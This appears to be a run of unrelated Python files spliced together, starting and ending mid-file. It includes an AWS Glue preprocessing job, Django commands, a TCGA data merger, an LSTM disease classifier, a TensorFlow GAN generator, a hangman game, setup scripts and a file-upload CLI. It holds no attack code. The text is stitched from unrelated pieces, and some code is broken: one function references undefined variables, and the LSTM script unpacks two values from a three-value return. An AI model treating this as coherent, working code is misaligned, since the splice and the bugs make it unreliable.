for demonstaration purposes that will become more prevelant in the future useages of this written programme",
"refapitwo":"dxponeapitwo",
"com":["""###codeblockhere###"""]
}
#closefi |
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue.dynamicframe import DynamicFrame
#Retrieve parameters for the Glue job.
args = getResolvedOptions(sys.argv, ['JOB_NAME', 'S3_SOURCE', 'S3_DEST',
'TRAIN_KEY', 'VAL_KEY'])
sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)
#Create a PySpark dataframe from the source table.
source_data_frame = spark.read.load(args['S3_SOURCE'], format='csv',
inferSchema=True, header=True)
# Drop unused columns
columns_to_drop = ['Phone', 'Day Charge', 'Eve Charge', 'Night Charge', 'Intl Charge']
source_data_frame = source_data_frame.drop(*columns_to_drop)
# Change data type of 'Area Code' columns to string
# source_data_frame['Area Code'] = source_data_frame['Area Code'].astype(object) # in Pandas
source_data_frame = source_data_frame.withColumn('Area Code', source_data_frame['Area Code'].cast('string'))
print("source_data_frame before get_dummies:", source_data_frame.columns)
import pyspark.sql.functions as F
# model_data = pd.get_dummies(source_data_frame) # in Pandas
def get_col_dummies(df, col_name):
categ = df.select(col_name).distinct().rdd.flatMap(lambda x:x).collect()
exprs = [F.when(F.col(col_name) == cat,1).otherwise(0)\
.alias('`'+col_name+'_'+str(cat)+'`') for cat in categ]
df = df.select(exprs+df.columns)
print('Columns before dropping the original one in get dummies:', df.columns)
df = df.drop(col_name)
return df
categorical_cols = ['Area Code', 'Churn?', "Int'l Plan", 'State', 'VMail Plan']
for cat_col in categorical_cols:
print('Creating dummy for column', cat_col)
source_data_frame = get_col_dummies(source_data_frame, cat_col)
print("source_data_frame after get_dummies:", source_data_frame.columns)
source_data_frame = source_data_frame.drop('Churn?_False.')
cols = source_data_frame.columns
y = cols.pop()
cols.insert(0,y)
# Reorder columns putting target variable ?Churn as first column
source_data_frame = source_data_frame.select(cols)
#Split the dataframe in to training and validation dataframes.
train_data, val_data = source_data_frame.randomSplit([.7,.3])
#Write both dataframes to the destination datastore.
train_path = args['S3_DEST'] + args['TRAIN_KEY']
val_path = args['S3_DEST'] + args['VAL_KEY']
train_data.write.save(train_path, format='csv', mode='overwrite', header=True)
val_data.write.save(val_path, format='csv', mode='overwrite', header=True)
#Complete the job.
job.commit()
|
#%% Generate graphs with the operating points
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
ground_truth_file = 'mscoco_ground_truth.json'
predictions_file = 'mscoco_predictions.json'
# initialize COCO ground truth api
cocoGt = COCO(ground_truth_file)
# initialize COCO detections api
cocoDt = cocoGt.loadRes(predictions_file)
imgIds=sorted(cocoGt.getImgIds())
annType = 'bbox'
# running evaluation
cocoEval = COCOeval(cocoGt, cocoDt, annType)
cocoEval.params.imgIds = imgIds
cocoEval.params.catIds = [1]
cocoEval.analyze_thresholds(save_to_dir='.', confidence_thresholds=[0.5, 0.6, 0.7], catIds=[1])
|
from django.core.management.base import BaseCommand, CommandError
from crowdataapp.models import Document
import re
import csv
class Command(BaseCommand):
help = 'Report weird numbers on entries.'
def handle(self, *args, **options):
documents = Document.objects.filter(verified=True)
with open('docs_with_several_verified_entries.csv', 'wb') as csvfile:
impwriter = csv.writer(csvfile, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
# report on documents validated more than once
for doc in documents:
form_entries = doc.form_entries.all()
form_fields = doc.document_set.form.all()[0].fields.filter(verify=True)
if len(form_entries) > 2:
verified_entry_count = 0
for fe in form_entries:
fe_to_dict = fe.to_dict()
#print "-------- For entry user %s." % fe_to_dict['username']
if fe_to_dict['answer_Adjudicatario_verified'] or \
fe_to_dict['answer_Tipo de gasto_verified'] or \
fe_to_dict['answer_Importe total_verified']:
verified_entry_count += 1
if verified_entry_count > 1:
print "The doc %s has more than one entry verified." % doc.id
doc.unverify()
doc.verify()
impwriter.writerow([doc.id, doc.verified])
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
tcga_path = './data/tcga/'
sample_sheet = pd.read_table(tcga_path + 'metadata/full_transcriptome_sample_sheet.txt')
#Function for removing decimals off ENSG gene names
cut_decimal = np.vectorize(lambda x : x.split('.')[0])
def prep_single_sample_metadata(sample_metadata):
"""
Function For Parsing Single Row in Metadata
"""
fileID = sample_metadata['File ID']
fileName = sample_metadata['File Name']
caseID = sample_metadata['Sample ID']
return {'directory': fileID, 'fileName':fileName, 'barcode':caseID}
def parse_single_sample(sample_dict, protein_coding_genes):
"""
Function for Reading in single sample and parsing it
"""
data_path = tcga_path + '/transcriptomics/'
sample_data = pd.read_table(data_path + sample_dict['directory'] + '/' + sample_dict['fileName'], header=None, index_col=0)[1]
sample_data.index = cut_decimal(sample_data.index)
sample_data /= sample_data.sum()
sample_data *= 10e6
sample_data.name = sample_dict['barcode']
sample_data = sample_data[protein_coding_genes].dropna()
return sample_data
#Read in protein coding gene list
protein_coding_genes = np.genfromtxt('./data/protein_coding_genes.txt',dtype=str)
protein_coding_genes = cut_decimal(protein_coding_genes)
df = pd.DataFrame()
for row in sample_sheet.index:
sample_dict = prep_single_sample_metadata(sample_sheet.loc[row,:])
df[sample_dict['barcode']] = parse_single_sample(sample_dict, protein_coding_genes)
df.to_csv('./data/tcga/merged_tcga_data.txt.gz', sep='\t', compression='gzip')
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
setup_args = generate_distutils_setup(
packages=['ekf_localization'],
package_dir={'':'msgs_lib'}
)
setup(**setup_args)
|
from src import app
app.run(debug=True, host="0.0.0.0", port=5000)
|
from engine.views.wavefront_parsers import ObjectParser
with open("objects/cockpit.obj", 'r') as f:
object_file_data = f.readlines()
class TestIntegratingObjectParser(object):
def setup(self):
self.parser = ObjectParser()
self.target = self.parser.parse(object_file_data)
def test_object_has_faces(self):
assert len(self.target._faces) > 0
|
def complexfunc(am,grades=10):
print courses[0]
print grades["compilers"]
if courses[0]<grades["compilers"]:
print "everything is ok"
test = complexfunc(200020)
|
from flask import request
from werkzeug import exceptions
from backend.app import app, db
from backend.models import Card
@app.route("/model", methods=["GET", "POST"])
def example():
if request.method == "POST":
if request.is_json:
data = request.get_json()
new_model = Card(data)
db.session.add(new_model)
db.session.commit()
return {"message": f"Created {new_model.name} with id {new_model.id}"}
else:
return {"message": "Invalid json!"}, exceptions.BadRequest.code
elif request.method == "GET":
models = Card.query.all()
return {"items": models}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
description = """ Extract physiological log files from encoded "_PHYSIO" DICOM file generated by CMRR MB sequences
and convert them to BIDS compliance format """
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except(IOError, ImportError):
long_description = open('README.md').read()
from setuptools import setup
DISTNAME = "cmrr2bids"
DESCRIPTION = description
VERSION = "0.0.1"
AUTHOR = "CoAxLab"
AUTHOR_EMAIL = "[email protected]"
URL = "https://github.com/CoAxLab/Cmrr2Bids"
DOWNLOAD_URL = URL + "/archive/" + VERSION + ".tar.gz"
ENTRY_POINTS = {
"console_scripts": [
"cmrr2bids = cmrr2bids.cmrr2bids:main"],
}
if __name__ == "__main__":
setup(
name=DISTNAME,
version=VERSION,
description=description,
long_description=long_description,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
download_url=DOWNLOAD_URL,
packages=['cmrr2bids'],
entry_points= ENTRY_POINTS,
install_requires = ['future>=0.16.0',
'pydicom>=1.3.0'],
#'Cmrr2Log @ git+git://github.com/CoAxLab/Cmrr2Log@master#egg=Cmrr2Log'],
dependency_links=['http://github.com/CoAxLab/Cmrr2Log/master#egg=Cmrr2Log']
)
|
from django.core.management.base import BaseCommand, CommandError
from arxiv import models, tasks
class Command(BaseCommand):
"""Send a test email to verify mail server configuration"""
def add_arguments(self, parser):
parser.add_argument('recipient')
def handle(self, *args, **kwargs):
# make a temporary subscriber
subscriber = models.Subscriber.objects.create(email=kwargs['recipient'], timezone='UTC')
try:
subscriber.subjects = models.Subject.objects.all()
tasks.email_feed(subscriber)
finally:
subscriber.delete()
|
"""Long Short Term Memory Network Classifier python module
website references:
https://www.kaggle.com/ternaryrealm/lstm-time-series-explorations-with-keras"""
import time
import itertools
import os
from os import listdir
from os.path import isfile, join
from numpy import genfromtxt
import numpy as np
from keras.models import Sequential
from keras.layers import LSTM, Dense
from keras.wrappers.scikit_learn import KerasRegressor
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.utils import to_categorical
from sklearn.ensemble import AdaBoostClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
import matplotlib.pyplot as plt
# fix random seed for reproducibility
# seed = 7
# np.random.seed(seed)
# Disable tensorflow warning messages
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Data Parameters
NUM_CLASS = 4 # Change to two for Healthy vs Diseased binary classification
NUM_FEATURES = 20
NUM_TIME_SERIES = 90000
NUM_TS_CROP = 20000 # time series data cropped by NUM_TS_CROP/2 on start and end
NUM_SKIP_SAMP = 5 # number of time series samples to skip over (after crop)
# Split Parameters
NUM_K_SPLIT = 5 # number k fold to split into training and test
VAL_SPLIT = 0.3 # validation set split from split training set (randomized for each k fold cross validation)
# Run Parameters
NUM_LSTM_CELLS = 50
NUM_EPOCH = 20
BATCH_SIZE = 500
if NUM_CLASS == 4:
LABEL_CTRL = 0
LABEL_ALS = 1
LABEL_HUNT = 2
LABEL_PARK = 3
n_outputs = 4
class_names = ['Control', 'ALS', 'Hunting', 'Parkingson']
else:
LABEL_CTRL = 0
LABEL_ALS = 1
LABEL_HUNT = 1
LABEL_PARK = 1
n_outputs = 1
class_names = ['Healthy', 'Diseased']
def load_data(folder):
file_list = [f for f in listdir(folder) if isfile(join(folder, f))]
# Labels for time series data
y = []
b = 0
X_file_list = []
B_file_list = []
print('Loading: label | file')
for file_name in file_list:
if 'als' in file_name:
y.append(LABEL_ALS)
X_file_list.append(file_name)
print(LABEL_ALS, end='')
elif 'control' in file_name:
y.append(LABEL_CTRL)
X_file_list.append(file_name)
print(LABEL_CTRL, end='')
elif 'hunt' in file_name:
y.append(LABEL_HUNT)
X_file_list.append(file_name)
print(LABEL_HUNT, end='')
elif 'park' in file_name:
y.append(LABEL_PARK)
X_file_list.append(file_name)
print(LABEL_PARK, end='')
elif 'blind' in file_name:
b += 1
B_file_list.append(file_name)
print('?', end='')
else:
print('~', end='')
print(' |', file_name)
print('b =', b)
# Time series data, (only using leg 0 for the time being)
X = np.empty([len(y), NUM_TIME_SERIES, NUM_FEATURES], float)
B = np.empty([b, NUM_TIME_SERIES, NUM_FEATURES], float)
for f_i in range(len(X_file_list)):
if any(x in file_list[f_i] for x in ['als', 'control', 'hunt', 'park']):
data = genfromtxt(folder + file_list[f_i], delimiter=',', dtype=float)
X[f_i] = data
for b_i in range(b):
data = genfromtxt(folder + 'blind' + str(b_i+1) + '.tsv', delimiter=',', dtype=float)
B[b_i] = data
# Crop time series data
X_crop = X[:, int(NUM_TS_CROP / 2):int(NUM_TIME_SERIES - NUM_TS_CROP / 2), :]
B_crop = B[:, int(NUM_TS_CROP / 2):int(NUM_TIME_SERIES - NUM_TS_CROP / 2), :]
# Downsample time series data
X_half = X_crop[:, 0::NUM_SKIP_SAMP, :]
B_half = B_crop[:, 0::NUM_SKIP_SAMP, :]
# Convert nan to 0
for s in range(X_half.shape[0]):
for t in range(X_half.shape[1]):
for f in range(X_half.shape[2]):
if np.isnan(X_half[s, t, f]):
X_half[s, t, f] = 0
for s in range(B_half.shape[0]):
for t in range(B_half.shape[1]):
for f in range(B_half.shape[2]):
if np.isnan(B_half[s, t, f]):
B_half[s, t, f] = 0
# Assert no Inf or nan data
assert not np.isnan(X_half.any())
assert not np.isnan(B_half.any())
X_final = X_half
B_final = B_half
return X_final, np.asarray(y), B_final
def baseline_model(num_lstm_cells=NUM_LSTM_CELLS, num_time_series=(NUM_TIME_SERIES-NUM_TS_CROP)):
# initialize a sequential keras model
model = Sequential()
# Input:
model.add(Dense(NUM_FEATURES, activation='sigmoid',
input_shape=(num_time_series, NUM_FEATURES)))
# LSTM Master Layer
model.add(LSTM(num_lstm_cells,
dropout=0.1,
recurrent_dropout=0.1,
return_sequences=True
# input_shape=(num_time_series, NUM_FEATURES
)
)
# LSTM Support Layer
model.add(LSTM(NUM_CLASS))
# Output: Dense Layer Classifier
# compile and fit our model
if NUM_CLASS == 2:
model.add(Dense(n_outputs, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
elif NUM_CLASS == 4:
model.add(Dense(n_outputs, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
# Run the following script using the following command via "python -m LSTMN.py"
if __name__ == "__main__":
# Time Start
start_time = time.time()
project_folder = '/media/alexanderfernandes/6686E8B186E882C3/Users/alexanderfernandes/Code/BIOM5405-ClassProject/'
# project_folder = 'D:/Users/Documents/School/Grad/BIOM5405/project/BIOM5405-ClassProject/'
X_total, y_total = load_data(project_folder + 'data/')
print('X_total =', X_total.shape)
print('y_total = ', y_total.tolist())
LSTM_CELLS = [2, 10, 25, 50, 100]
for lstmncell in range(5):
n_timesteps = X_total.shape[1]
n_features = X_total.shape[2]
print("Number Classes:", n_outputs)
print("Cropped Time Series Length:", n_timesteps)
print("Number Features:", NUM_FEATURES)
# define 5-fold cross validation test harness
kfold = StratifiedKFold(n_splits=NUM_K_SPLIT, shuffle=True)
cvscores = []
cm_sum = None
# Bagging
nbags = 5
fold_number = 1 # Print logging counter
for train_index, test_index in kfold.split(X_total, y_total):
print("CV Fold %d/%d" % (fold_number, NUM_K_SPLIT))
fold_number += 1
X_train, X_test = X_total[train_index], X_total[test_index]
y_train, y_test = y_total[train_index], y_total[test_index]
if NUM_CLASS == 4:
y_train = to_categorical(y_train, num_classes=n_outputs)
y_test = to_categorical(y_test, num_classes=n_outputs)
print("TRAIN/VAL:", len(train_index), train_index.tolist())
print("TEST:", len(test_index), test_index.tolist())
# Split validation set from the training set
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=VAL_SPLIT)
# Regular Model
model = baseline_model(num_lstm_cells=LSTM_CELLS[lstmncell])
model.fit(X_train, y_train,
validation_data=(X_val, y_val),
epochs=NUM_EPOCH,
batch_size=BATCH_SIZE,
verbose=2)
scores = model.evaluate(X_test, y_test, verbose=2)
print("%s: %.2f%%" % (model.metrics_names[1], scores[1] * 100))
cvscores.append(scores)
y_pred = model.predict(X_test, batch_size=BATCH_SIZE)
print("y_test:", y_test)
print("y_pred:", y_pred)
# classify output predictions
if NUM_CLASS == 2:
y_pred = (y_pred > 0.5)
elif NUM_CLASS == 4:
y_ohe = y_pred
y_pred = []
for y in y_ohe:
mx = 0
mx_i = None
for i in range(4):
if y[i] > mx:
mx_i = i
mx = y[i]
y_pred.append(mx_i)
y_ohe = y_test
y_test = []
for y in y_ohe:
mx = 0
mx_i = None
for i in range(4):
if y[i] > mx:
mx_i = i
mx = y[i]
y_test.append(mx_i)
print("y_test:", y_test)
print("y_pred:", y_pred)
# confusion matrix
if cm_sum is None:
cm_sum = confusion_matrix(y_test, y_pred)
else:
cm_sum += confusion_matrix(y_test, y_pred)
print("%.2f%% (+/- %.2f%%)" % (np.mean(cvscores), np.std(cvscores)))
# # Plot non-normalized confusion matrix
# plt.figure()
# plot_confusion_matrix(cm_sum, classes=class_names, title='Confusion matrix, without normalization')
# Time End
elapsed_time = time.time()
hours, rem = divmod(elapsed_time - start_time, 3600)
minutes, seconds = divmod(rem, 60)
print("Elapsed Time: {:0>2}:{:0>2}:{:05.2f}".format(int(hours), int(minutes), seconds))
# plt.show()
|
import os
DIR_NEW_TEMPLATE = 'new_templates'
NEW_PROJECT_DIR_NAME_PREFIX = 'designer_'
NEW_TEMPLATE_IMAGE_PATH = os.path.join(DIR_NEW_TEMPLATE, 'images')
DIR_PROFILES = 'profiles'
DESIGNER_CONFIG_FILE_NAME = 'config.ini'
|
# coding=utf-8
# Copyright 2019 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions of generator functions."""
import tensorflow as tf
from tensorflow_gan.examples.self_attention_estimator import ops
def make_z_normal(num_batches, batch_size, z_dim):
"""Make random noise tensors with normal distribution.
Args:
num_batches: copies of batches
batch_size: the batch_size for z
z_dim: The dimension of the z (noise) vector.
Returns:
zs: noise tensors.
"""
shape = [num_batches, batch_size, z_dim]
z = tf.random.normal(shape, name='z0', dtype=tf.float32)
return z
def make_class_labels(batch_size, num_classes):
"""Generate class labels for generation."""
# Uniform distribution.
# TODO(augustusodena) Use true distribution of ImageNet classses.
gen_class_logits = tf.zeros((batch_size, num_classes))
gen_class_ints = tf.random.categorical(logits=gen_class_logits, num_samples=1)
gen_class_ints.shape.assert_has_rank(2)
gen_class_ints = tf.squeeze(gen_class_ints, axis=1)
gen_class_ints.shape.assert_has_rank(1)
return gen_class_ints
def usample(x):
"""Upsamples the input volume.
Args:
x: The 4D input tensor.
Returns:
An upsampled version of the input tensor.
"""
# Allow the batch dimension to be unknown at graph build time.
_, image_height, image_width, n_channels = x.shape.as_list()
# Add extra degenerate dimension after the dimensions corresponding to the
# rows and columns.
expanded_x = tf.expand_dims(tf.expand_dims(x, axis=2), axis=4)
# Duplicate data in the expanded dimensions.
after_tile = tf.tile(expanded_x, [1, 1, 2, 1, 2, 1])
return tf.reshape(after_tile,
[-1, image_height * 2, image_width * 2, n_channels])
def block(x, labels, out_channels, num_classes, name, training=True):
"""Builds the residual blocks used in the generator.
Args:
x: The 4D input tensor.
labels: The labels of the class we seek to sample from.
out_channels: Integer number of features in the output layer.
num_classes: Integer number of classes in the labels.
name: The variable scope name for the block.
training: Whether this block is for training or not.
Returns:
A `Tensor` representing the output of the operation.
"""
with tf.compat.v1.variable_scope(name):
bn0 = ops.ConditionalBatchNorm(num_classes, name='cbn_0')
bn1 = ops.ConditionalBatchNorm(num_classes, name='cbn_1')
x_0 = x
x = tf.nn.relu(bn0(x, labels))
x = usample(x)
x = ops.snconv2d(x, out_channels, 3, 3, 1, 1, training, 'snconv1')
x = tf.nn.relu(bn1(x, labels))
x = ops.snconv2d(x, out_channels, 3, 3, 1, 1, training, 'snconv2')
x_0 = usample(x_0)
x_0 = ops.snconv2d(x_0, out_channels, 1, 1, 1, 1, training, 'snconv3')
return x_0 + x
def generator(zs, target_class, gf_dim, num_classes, training=True):
"""Builds the generator segment of the graph, going from z -> G(z).
Args:
zs: Tensor representing the latent variables.
target_class: The class from which we seek to sample.
gf_dim: The gf dimension.
num_classes: Number of classes in the labels.
training: Whether in train mode or not. This affects things like batch
normalization and spectral normalization.
Returns:
- The output layer of the generator.
- A list containing all trainable varaibles defined by the model.
"""
with tf.compat.v1.variable_scope(
'generator', reuse=tf.compat.v1.AUTO_REUSE) as gen_scope:
act0 = ops.snlinear(
zs, gf_dim * 16 * 4 * 4, training=training, name='g_snh0')
act0 = tf.reshape(act0, [-1, 4, 4, gf_dim * 16])
# pylint: disable=line-too-long
act1 = block(act0, target_class, gf_dim * 16, num_classes, 'g_block1', training) # 8
act2 = block(act1, target_class, gf_dim * 8, num_classes, 'g_block2', training) # 16
act3 = block(act2, target_class, gf_dim * 4, num_classes, 'g_block3', training) # 32
act3 = ops.sn_non_local_block_sim(act3, training, name='g_ops') # 32
act4 = block(act3, target_class, gf_dim * 2, num_classes, 'g_block4', training) # 64
act5 = block(act4, target_class, gf_dim, num_classes, 'g_block5', training) # 128
bn = ops.BatchNorm(name='g_bn')
act5 = tf.nn.relu(bn(act5))
act6 = ops.snconv2d(act5, 3, 3, 3, 1, 1, training, 'g_snconv_last')
out = tf.nn.tanh(act6)
var_list = tf.compat.v1.get_collection(
tf.compat.v1.GraphKeys.TRAINABLE_VARIABLES, gen_scope.name)
return out, var_list
|
import random
import os
def read_data(filepath="./archivos/data.txt"):
words = []
with open(filepath, "r", encoding="utf-8") as f:
for line in f:
words.append(line.strip().upper())
return words
def run():
data = read_data(filepath="./archivos/data.txt")
chosen_word = random.choice(data)
chosen_word_list = [letter for letter in chosen_word]
chosen_word_list_underscores = ["_"] * len(chosen_word_list)
letter_index_dict = {}
for idx, letter in enumerate(chosen_word):
if not letter_index_dict.get(letter):
letter_index_dict[letter] = []
letter_index_dict[letter].append(idx)
while True:
os.system("cls") # Si estás en Unix (Mac o Linux) cambia cls por clear
print("¡Adivina la palabra!")
for element in chosen_word_list_underscores:
print(element + " ", end="")
print("\n")
letter = input("Ingresa una letra: ").strip().upper()
assert letter.isalpha(), "Solo puedes ingresar letras"
if letter in chosen_word_list:
for idx in letter_index_dict[letter]:
chosen_word_list_underscores[idx] = letter
if "_" not in chosen_word_list_underscores:
os.system("cls") # Si estás en Unix (Mac o Linux) cambia cls por clear
print("¡Ganaste! La palabra era", chosen_word)
break
if __name__ == '__main__':
run()
# ¿Viendo la solución? No hay drama crack
# Python es mejor que JavaScript |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, glob, shutil, subprocess as sp
from skbuild import setup
from skbuild.setuptools_wrap import create_skbuild_argparser
import argparse
import warnings
import platform
cmake_args = []
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-h", "--help", help="Print help", action='store_true')
def add_bool_opt(opt, enable_opt, disable_opt):
global cmake_args
if enable_opt and disable_opt:
msg = """\nWarning! python options for CMake argument '{}' was enabled \
AND disabled.\nGiving priority to disable...\n""".format(opt)
warnings.warn(msg)
enable_opt = False
if enable_opt:
cmake_args.append("-D{}:BOOL={}".format(opt, "ON"))
if disable_opt:
cmake_args.append("-D{}:BOOL={}".format(opt, "OFF"))
def add_option(lc_name, disp_name):
global parser
# enable option
parser.add_argument("--enable-{}".format(lc_name), action='store_true',
help="Explicitly enable {} build".format(disp_name))
# disable option
parser.add_argument("--disable-{}".format(lc_name), action='store_true',
help="Explicitly disnable {} build".format(disp_name))
add_option("cuda", "CUDA")
add_option("nvtx", "NVTX (NVIDIA Nsight)")
add_option("arch", "Hardware optimized")
add_option("avx512", "AVX-512 optimized")
add_option("gperf", "gperftools")
add_option("timemory", "TiMemory")
add_option("sanitizer", "Enable sanitizer (default=leak)")
add_option("tasking", "Tasking library (PTL)")
parser.add_argument("--sanitizer-type", default="leak",
help="Set the sanitizer type",
type=str, choices=["leak", "thread", "address", "memory"])
parser.add_argument("--cuda-arch", help="CUDA architecture flag",
type=int, default=35)
args, left = parser.parse_known_args()
# if help was requested, print these options and then add '--help' back
# into arguments so that the skbuild/setuptools argparse catches it
if args.help:
parser.print_help()
left.append("--help")
sys.argv = sys.argv[:1]+left
add_bool_opt("TOMOPY_USE_CUDA", args.enable_cuda, args.disable_cuda)
add_bool_opt("TOMOPY_USE_NVTX", args.enable_nvtx, args.disable_nvtx)
if args.enable_avx512 and not args.enable_arch:
args.enable_arch = True
args.disable_arch = False
add_bool_opt("TOMOPY_USE_ARCH", args.enable_arch, args.disable_arch)
add_bool_opt("TOMOPY_USE_AVX512", args.enable_avx512, args.disable_avx512)
add_bool_opt("TOMOPY_USE_GPERF", args.enable_gperf, args.disable_gperf)
add_bool_opt("TOMOPY_USE_TIMEMORY", args.enable_timemory, args.disable_timemory)
add_bool_opt("TOMOPY_USE_SANITIZER", args.enable_sanitizer, args.disable_sanitizer)
add_bool_opt("TOMOPY_USE_PTL", args.enable_tasking, args.disable_tasking)
if args.enable_cuda:
cmake_args.append("-DCUDA_ARCH={}".format(args.cuda_arch))
if args.enable_sanitizer:
cmake_args.append("-DSANITIZER_TYPE:STRING={}".format(args.sanitizer_type))
if len(cmake_args) > 0:
print("\n\n\tCMake arguments set via command line: {}\n".format(cmake_args))
if platform.system() == "Darwin":
# scikit-build will set this to 10.6 and C++ compiler check will fail
version = platform.mac_ver()[0].split('.')
version = ".".join([version[0], version[1]])
cmake_args += ["-DCMAKE_OSX_DEPLOYMENT_TARGET={}".format(version)]
# suppress:
# "setuptools_scm/git.py:68: UserWarning: "/.../tomopy" is shallow and may cause errors"
# since 'error' in output causes CDash to interpret warning as error
with warnings.catch_warnings():
warnings.simplefilter("ignore")
setup(
name='tomopy',
packages=['tomopy'],
package_dir={"": "source"},
setup_requires=['setuptools_scm', 'setuptools_scm_git_archive'],
use_scm_version=True,
include_package_data=True,
zip_safe=False,
author='Doga Gursoy',
author_email='[email protected]',
description='Tomographic Reconstruction in Python.',
keywords=['tomography', 'reconstruction', 'imaging'],
url='http://tomopy.readthedocs.org',
download_url='http://github.com/tomopy/tomopy.git',
license='BSD-3',
cmake_args=cmake_args,
cmake_languages=('C'),
platforms='Any',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: C']
)
|
#!/usr/bin/env python3
# Hiber [File/Link] CLI Client
# Jus de Patate - 2020
import sys
import os
import re
try:
import requests
except ImportError:
print("Couldn't import requests")
exit(1)
version = "1.0"
hiberfile = "https://hiberfile.com"
hiberlink = "https://hiber.link"
def shortLink(originalLink):
try:
r = requests.post(
hiberlink + "/link.php",
data={"link": originalLink},
headers={"User-Agent": "curl"},
)
except requests.exceptions as e:
print("Couldn't send a request to " + hiberlink + ":")
sys.exit(1)
shortLink = r.text
if shortLink == "erreur":
print("Server returned an error")
else:
print(r.text)
def uploadFile(file):
fileDict = {"my_file": open(file, "rb")}
try:
r = requests.post(
hiberfile + "/send.php", files=fileDict, data={"time": "7 jours"}
)
except requests.exceptions as e:
print("Upload failed: " + e)
sys.exit(1)
fileLink = r.headers["X-HIBERFILE-LINK"]
if fileLink == "Erreur":
print("Server returned an error")
sys.exit(1)
else:
print(fileLink)
if len(sys.argv) < 2 or sys.argv[1] == "--help" or sys.argv[1] == "-h":
print("Hiber Client for CLI - Jus de Patate - " + version)
print("HiberFile instance is set at " + hiberfile)
print("HiberLink instance is set at " + hiberlink)
print("")
print("Please use either a file or an url as command argument")
elif os.path.exists(sys.argv[1]):
uploadFile(sys.argv[1])
elif re.match("^.*[.].*$", sys.argv[1]):
shortLink(sys.argv[1])
else:
print("Unrecognized argument")
|
# -*- coding: utf-8 -*-
"""
openedx_export_plugins Django application initialization.
"""
from django.apps import AppConfig
from openedx.core.djangoapps.plugins.constants import PluginURLs, ProjectType
class OpenedxExportPluginsConfig(AppConfig):
"""
Configuration for the openedx_export_plugins Django application.
"""
name = 'openedx_export_plugins'
plugin_app = {
PluginURLs.CONFIG: {
ProjectType.CMS: {
PluginURLs.NAMESPACE: 'openedx_export_plugins',
}
},
}
|
#!/usr/local/autopkg/python
import json
import plistlib
import unittest
from io import BytesIO
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import patch
from autopkglib import Preferences
TEST_JSON_PREFS = b"""{"CACHE_DIR": "/path/to/cache"}"""
TEST_PLIST_PREFS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CACHE_DIR</key>
<string>/path/to/cache</string>
</dict>
</plist>
"""
def patch_open(data: bytes, **kwargs) -> mock._patch:
"""Patches `open` to return return a `BytesIO` object.
This is similar to calling `patch("builtins.open, new_callable=mock_open, ...)`,
but returns a real IO-type object that supports everything that the usual
file object returned by open supports, ensuring greater compatibility with
arbitrary libraries at the cost of not resetting itself each time its called."""
def _new_mock():
omock = mock.MagicMock(name="open", spec="open")
omock.side_effect = lambda *args, **kwargs: BytesIO(data)
return omock
return patch("builtins.open", new_callable=_new_mock, **kwargs)
class TestPreferences(unittest.TestCase):
"""Test Preferences class"""
PRIMARY_NON_MACOS_PLATFORMS = ["Linux", "Windows"]
def setUp(self):
self._workdir = TemporaryDirectory()
self.mock_platform = patch("autopkglib.sys.platform").start()
# Force loading to go through the file-backed path by default.
self.mock_platform.return_value = "__HighlyUnlikely-Platform-Name__"
# Mock all of these for all tests to help ensure we do not accidentally
# use the real macOS preference store.
self.mock_copykeylist = patch("autopkglib.CFPreferencesCopyKeyList").start()
# Return an empty list of preference keys by default. Makes a new list on
